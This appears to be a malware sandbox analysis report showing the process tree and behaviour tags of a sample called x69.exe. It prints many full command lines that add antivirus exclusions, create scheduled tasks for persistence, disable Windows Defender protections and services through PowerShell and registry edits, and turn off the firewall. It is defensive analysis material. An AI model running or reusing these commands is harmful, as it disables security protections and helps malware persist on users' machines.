Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid   Process
3664  Explorer.EXE
3288  tcpview64.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 21 IoCs
Suspicious use of SendNotifyMessage 49 IoCs
Suspicious use of SetWindowsHookEx 10 IoCs
pid   Process
3188  firefox.exe
3188  firefox.exe
3188  firefox.exe
3188  firefox.exe
3664  Explorer.EXE
3664  Explorer.EXE
3664  Explorer.EXE
3664  Explorer.EXE
3288  tcpview64.exe
3288  tcpview64.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Windows\system32\winlogon.exe  cmdline: winlogon.exe  PID:612
  C:\Windows\system32\dwm.exe  cmdline: "dwm.exe"  PID:936
  C:\Windows\System32\dllhost.exe  cmdline: C:\Windows\System32\dllhost.exe /Processid:{a19242dc-96bb-48ca-9b49-86f1ad87c554}  PID:420
  C:\Windows\System32\dllhost.exe  cmdline: C:\Windows\System32\dllhost.exe /Processid:{3f5ca867-fddd-4c7c-b435-bd2d7a17afcf}  PID:5312
C:\Windows\system32\lsass.exe  cmdline: C:\Windows\system32\lsass.exe  PID:676
C:\Windows\system32\svchost.exe  cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM  PID:972
C:\Windows\System32\svchost.exe  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts  PID:392
C:\Windows\System32\svchost.exe  cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService  PID:476
C:\Windows\system32\svchost.exe  cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc  PID:456
C:\Windows\system32\svchost.exe  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  PID:1032
C:\Windows\System32\svchost.exe  cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog  PID:1080
  - Indicator Removal: Clear Windows Event Logs
C:\Windows\system32\svchost.exe  cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi  PID:1184
C:\Windows\system32\svchost.exe  cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule  PID:1240
  - Drops file in System32 directory
  C:\Windows\system32\taskhostw.exe  cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}  PID:3220
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "[obfuscated PowerShell command line omitted]"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:4284
    C:\Windows\System32\Conhost.exe  cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  PID:4816
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "[obfuscated PowerShell command line omitted]"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5464
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:4324
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:5756
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:6972
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:7064
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:1816
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:3192
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:1052
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:2860
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:5684
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:460
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:4768
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:6076
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:5512
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"2⤵
- Executes dropped EXE
PID:2584
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1292
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1308
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1320
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1352
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1480
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1528
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1544
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2604
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1588
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1604
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1752
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
- Modifies Internet Explorer settings
PID:1808
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1896
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1920
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2044
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1156
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2152
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2284
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2336
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2384
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2544
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2560
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2704
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2740
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2812
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2844
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2852
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3096
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3128
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3424
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3584
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3664
C:\Users\Admin\AppData\Local\Temp\x69.exe"C:\Users\Admin\AppData\Local\Temp\x69.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5348
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5712
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4796
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3640
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2492
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5472
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5252
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:932
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5872
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2392
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3192
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4008
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\020251ea.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:3268
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3256
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7271.tmp\7272.tmp\7273.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:6028
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true5⤵PID:5160
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2092
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1252
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:232
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5300
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1656
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4124
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5680
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1760
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5416
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5072
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5928
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6712
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:5160
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:4164
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:524
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6340
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:3648
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
PID:568
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:7076
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
PID:7136
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6808
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:696
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:5684
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:2888
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:2080
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:6864
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5800
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:4988
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5284
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:3716
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:5740
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:5216
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:5660
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:3512
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:4460
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:1992
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:5304
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:2052
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:540
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:896
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:1332
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:6152
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:6216
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵
- Modifies registry class
PID:4824
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵
- Modifies registry class
PID:1560
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵
- Modifies registry class
PID:6268
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:4716
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6336
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5032
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6220
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:5504
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:568
C:\Users\Admin\AppData\Roaming\x69install.exe"C:\Users\Admin\AppData\Roaming\x69install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1568
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exeC:\Users\Admin\AppData\Local\Temp\iyMbXS.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1368
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1c955ede.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:776
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1364
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4944
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1332
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5816
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exeC:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71A6.tmp\71A7.tmp\71A8.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3792
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true5⤵PID:400
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5548
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1984
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2140
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5060
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1784
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:376
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:556
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4896
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
PID:1440
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
PID:3124
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
PID:1844
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
PID:6668
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:2400
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
PID:4456
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
